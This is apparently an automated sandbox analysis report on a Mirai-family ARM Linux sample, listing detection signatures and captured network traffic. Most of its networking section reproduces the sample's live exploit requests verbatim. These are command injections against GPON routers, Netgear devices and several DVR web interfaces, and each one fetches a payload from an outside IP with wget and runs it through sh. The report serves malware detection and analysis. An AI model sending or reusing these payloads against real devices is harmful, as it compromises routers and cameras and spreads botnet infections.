Linux Analysis Report
firmware.armv4l.elf

Overview

General Information

Sample name: firmware.armv4l.elf
Analysis ID: 1502467
MD5: 5791d11575d52a0773716ce215a6c661
SHA1: 29d3d9042e1955b7d7619bd8d3edb5ebed00fec6
SHA256: 152ce9bf498ae4df1184e78d7570bdbe9d8660e8cb1bb2277cff79b7f6489c31
Tags: elffirmware

Detection

Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Connects to many different domains
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes massive DNS lookups (> 100)
Executes the "hostname" command used to retrieve the computers name
HTTP GET or POST without a user agent
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

AV Detection

Source: firmware.armv4l.elf Avira: detected
Source: /usr/bin/mabxpzyo Avira: detection malicious, Label: LINUX/Mirai.bonb
Source: firmware.armv4l.elf ReversingLabs: Detection: 52%
Source: firmware.armv4l.elf Virustotal: Detection: 56%

Networking

Source: global traffic TCP traffic: 49.54.56.46 ports 1,2,12846,4,6,8
Source: unknown Network traffic detected: HTTP traffic on port 43406 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43408 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43410 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43412 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43414 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 44744 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 44842 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52764 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57196 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57198 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57200 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57220 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57222 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57224 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33232 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34582 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34584 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34586 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36084 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36086 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36088 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 42566 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42570 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42572 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42574 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42576 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42578 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42580 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 35960 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35966 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35974 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35984 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35986 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35988 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35990 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 46950 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46952 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46954 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46956 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46958 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46960 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46980 -> 8082
Source: unknown Network traffic detected: DNS query count 191
Source: global traffic TCP traffic: 192.168.2.13:41202 -> 32.10.0.0:0
Source: global traffic TCP traffic: 192.168.2.13:56962 -> 49.54.56.46:12846
Source: global traffic TCP traffic: 192.168.2.13:52202 -> 48.46.50.48:0
Source: global traffic TCP traffic: 192.168.2.13:37064 -> 8.8.8.8:81
Source: global traffic DNS traffic detected: number of DNS queries: 191
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.15.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.153.249Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.37Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.51Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.68Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.51Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.67Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.67Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.68Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.147Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.138Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.138Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.105Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.105Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.195Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.128Content-Length: 216Connection: close Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 109.248.201.170Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.129Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.209Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.162Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
